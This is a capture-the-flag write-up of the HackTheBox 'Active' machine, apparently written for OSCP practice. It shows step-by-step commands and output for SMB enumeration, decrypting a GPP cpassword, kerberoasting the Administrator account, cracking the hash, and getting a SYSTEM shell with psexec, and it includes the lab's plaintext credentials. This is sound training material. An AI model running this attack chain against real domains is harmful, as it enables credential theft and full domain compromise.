Active

Today I am going to solve Active box on HackTheBox to prepare myself for the OSCP certificate.

Enumeration:

First we will start with nmap scan to identify what ports are open on the target machine:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ sudo nmap -sCV -p- --min-rate 1000 -vv 10.129.109.218 -oN nmap/services.nmap
Nmap scan report for 10.129.109.218                                                  
Host is up, received echo-reply ttl 127 (0.29s latency).          
Scanned at 2025-09-01 10:51:55 EDT for 153s                                                                                                                                
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:                                                                          
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)                
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-01 14:53:15Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC              
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127                      
464/tcp   open  kpasswd5?     syn-ack ttl 127                      
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0                                                                                          
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5722/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

<snipped>

To illustrate Nmap options I used:

  • -sCV: Use nmap default scripts, and scan service versions.

  • -p-: Scan all TCP ports.

  • --min-rate: Increase number of packets sent per second.

  • -vv: Increase verbosity level.

  • -oN: Output the result to a file.

We can see that we are dealing with an active directory domain controller, and its called DC, and we have multiple ports open, dns on port 53, kerberos on port 88, smb on port 445, ldap on ports (389,636,3268,3269).

I will add the domain: active.htb and the hostname of the target machine DC to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ cat /etc/hosts            
127.0.0.1       localhost
127.0.1.1       kali
<snipped>

10.129.109.218 DC.active.htb active.htb DC

GPP Password Abuse:

Lets enumerate the shares using netexec and will check if we have null session access:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ netexec smb 10.129.109.218 -u '' -p '' --shares    
SMB         10.129.109.218  445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) 
SMB         10.129.109.218  445    DC               [+] active.htb\: 
SMB         10.129.109.218  445    DC               [*] Enumerated shares
SMB         10.129.109.218  445    DC               Share           Permissions     Remark
SMB         10.129.109.218  445    DC               -----           -----------     ------
SMB         10.129.109.218  445    DC               ADMIN$                          Remote Admin
SMB         10.129.109.218  445    DC               C$                              Default share
SMB         10.129.109.218  445    DC               IPC$                            Remote IPC
SMB         10.129.109.218  445    DC               NETLOGON                        Logon server share 
SMB         10.129.109.218  445    DC               Replication     READ            
SMB         10.129.109.218  445    DC               SYSVOL                          Logon server share 
SMB         10.129.109.218  445    DC               Users

  • -u: To specify a username.

  • -p: To specify a password.

  • --shares: To list out the shares.

We can see that we have read permissions over the Replication share, and via smbclient we can authenticate to that share to view what it contains:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ smbclient //active.htb/replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
<snippped>
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.7 KiloBytes/sec) (average 1.0 KiloBytes/sec)
<snipped>
smb: \> exit

So we have the group policy preference file (Groups.xml) which normally contains a username and an encrypted password that we can easly decrypt it using variaus tools, and I will use gpp-decrypt to decrypt it:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ cat active.htb/Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Preferences/Groups/Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Here we can notice a domain user called SVC_TGS user, and cpassword which has encrypted password that we will pass it to gpp-decrypt tool:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

So we have a username and a password, lets check if those credentials are valid using netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ netexec smb 10.129.109.218 -u svc_tgs -p GPPstillStandingStrong2k18    
SMB         10.129.109.218  445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) 
SMB         10.129.109.218  445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18

That + sign indicate that this is a valid domain user.

Privilege Escalation to Administrator:

Now since we have a valid domain user, we can use bloodhound to find any path that could help us compromise the whole environment.

BloodHound:

I will use rusthound-ce as the ingestor:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ rusthound-ce -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' -d active.htb -f DC.active.htb                                                                 12:05:03 [2/4]
---------------------------------------------------                                                                                                                        
Initializing RustHound-CE at 12:04:54 on 09/01/25                                                                                                                          
Powered by @g0h4n_0
---------------------------------------------------

[2025-09-01T16:04:54Z INFO  rusthound_ce] Verbosity level: Info
[2025-09-01T16:04:54Z INFO  rusthound_ce] Collection method: All
[2025-09-01T16:04:55Z INFO  rusthound_ce::ldap] Connected to ACTIVE.HTB Active Directory!
[2025-09-01T16:04:55Z INFO  rusthound_ce::ldap] Starting data collection...
[2025-09-01T16:04:55Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-01T16:04:58Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=active,DC=htb
[2025-09-01T16:04:58Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-01T16:05:00Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=active,DC=htb
[2025-09-01T16:05:00Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-01T16:05:02Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=active,DC=htb
[2025-09-01T16:05:02Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-01T16:05:02Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=active,DC=htb
[2025-09-01T16:05:02Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-01T16:05:03Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=active,DC=htb
[2025-09-01T16:05:03Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...
[2025-09-01T16:05:03Z INFO  rusthound_ce::objects::domain] MachineAccountQuota: 10
[2025-09-01T16:05:03Z INFO  rusthound_ce::api] Parsing LDAP objects finished!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 5 users parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_users.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 49 groups parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_groups.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 1 computers parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_computers.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 1 ous parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_ous.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 3 domains parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_domains.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_gpos.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 67 containers parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_containers.json created!

RustHound-CE Enumeration Completed at 12:05:03 on 09/01/25! Happy Graphing!

Now lets open bloodhound-ce:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ sudo bloodhound           
[sudo] password for kali:          
                                          
 Starting neo4j                       
Neo4j is not running.                
Directories in use:          
home:         /usr/share/neo4j                                                       
config:       /usr/share/neo4j/conf    
logs:         /etc/neo4j/logs   
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import                                                
data:         /etc/neo4j/data                                                        
certificates: /usr/share/neo4j/certificates           
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.                                                                      
Started neo4j (pid:54595). It is available at http://localhost:7474
There may be a short delay until the server is ready.                                                                                                                      
......................................................                                                                                                                     
 Bloodhound will start

I will navigate to file ingest page, and ingest the data rusthound collected:

Kerberoasting:

If we checked kerberoastable users we will find that the administrator is kerberoastable:

Using impacket-GetUserSPNs lets get the administrator TGS:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ impacket-GetUserSPNs -dc-ip 10.129.109.218 active.htb/svc_tgs:GPPstillStandingStrong2k18 -request-user administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2025-09-01 10:28:00.613750             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c7c1db9ab6dc34c3a0a01009af9a0bb1$1d6fab1eb00eb3304836b8716ee49a66707a4b0c3ae98cb8b6f1a0abfd55059650ad2d221868748c968000704cbd3fff1f12b669c9eee24e48690817f73d719bfea8294ae009d873d2809963f147866fd8fb684e12c11b4e557020daae1dcb20808b463ec271c98718ccaeedc961b7dfbf52eb0c15f1b2e6472374bc018c3be6c29cbf0ff719ccca015bfb8c407231d0fb68ab22ec102fe08c3b91f5fc6a98762d89c5737dd53f548398cf29779f643ab5b1e5ca6bb70f130503a36115052ac9b9816a47fd980e282b7e6c754c3752438947d6e639488a3fa5ebce79824bb936653601a59b6c0008fef272952c6a0f17a4b7eb278388260b6af0a736b9a845b5d81568a86a5d3583c2f6c893de92917aa6927dcd95fe6d7d0216e83794cc56b2d8ce618b91f03d141d5dd229fc0a739c34798bccae6e36cad91ac303e955f8d759e5f3f6fee8a6463868b84ee12f82de73a7f6f7c53a5f0fcd0d7fe05e3f3a6a5b90709d5aebc3c57d023d658e63c259a1706a0bca1523dc53fe3b8e01c2f09521c5ad3f268a6c06b720ba62613867bc981bdbaf3411c6f9d7a6501e4bdcf055c5ec9a27053eaa211e52b22ba5d72840c7b2bcfbdd2737b02fde1f6065433c4dbb591ba360ffd58b95178a12b2232d06ebc7fe3c8df65bf8b2a178fa1b89faabac7fe2e97cbae74c59312c7fb8c6a5b829a20cffa244b34f8f42ef5b62f637b9d71e222f16e1a00f621f05c7d12d84ba97b755503436899f565bcdf7262016d2a918ff334d6e6497b981f4ad3799d5eccaadeb8931df048ee29b1127d8b1d13fb5e85ec13a7e0c793c3f6744d0f211f0019e256df012c65e5962ae3cb07a2f29182720447ba60abccdae5c39de8ca4c9c538aa6c3a5d5866f35b22e13813b3c5829dc6e379405f415433c50349fb129a72ea0d98e0ab464c3a8b0d4a3ef56678e6c6f97126e2b4cd2c2bef1eefca504cfe7c9f999e8d8360419bbd4d5dcef6ffc69d1e433894f54c0a2380d7a913411846f2192efaf59867a60f231706ae29a31c970d441b2a534cfce0f23d77feca50621bb260397fcd0273bd470da6999a8f050945c1789a399ae60da5891f29d698446e923411a2024297eb0f7ddf26521d4abeaf7d721530a4f000bd25a38a6fb41b3e960d75013e9bc779ea4a97cfe4457911f904c3626fbe53ef83327f29b4b939e5df7b885b58e9b5a940b990f685887e05253d8ebf5d1acb0cf1ecd23c509f9856b48fc5dfe1a1be53

We will save it to a file and attempt to crack it via hashcat:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ hashcat administrator.hash /usr/share/wordlists/rockyou.txt

We were able to crack the administrator TGS ticket and recover the password.

If we checked netexec with those credentials:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ netexec smb 10.129.109.218 -u administrator -p Ticketmaster1968
SMB         10.129.109.218  445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) 
SMB         10.129.109.218  445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)

We will see the Pwn3d! which means we are domain admins, lets use impacket-psexec to authenticate to the target machine:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ impacket-psexec active.htb/administrator:Ticketmaster1968@dc.active.htb                                             
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc.active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file IWKkxNEt.exe
[*] Opening SVCManager on dc.active.htb.....
[*] Creating service aNNp on dc.active.htb.....
[*] Starting service aNNp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC
C:\Windows\system32> ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::9868:c766:ba72:6acf
   Link-local IPv6 Address . . . . . : fe80::9868:c766:ba72:6acf%11
   IPv4 Address. . . . . . . . . . . : 10.129.109.218
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%11
                                       10.129.0.1
Tunnel adapter isatap..htb:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

And we can read the flags:

PS C:\Windows\System32> cat C:\Users\svc_tgs\Desktop\user.txt
b54499b9ab3855a9****************
PS C:\Windows\System32> cat C:\Users\administrator\Desktop\root.txt
3de721739719dece****************
PreviousWindows & ADNextForest

Last updated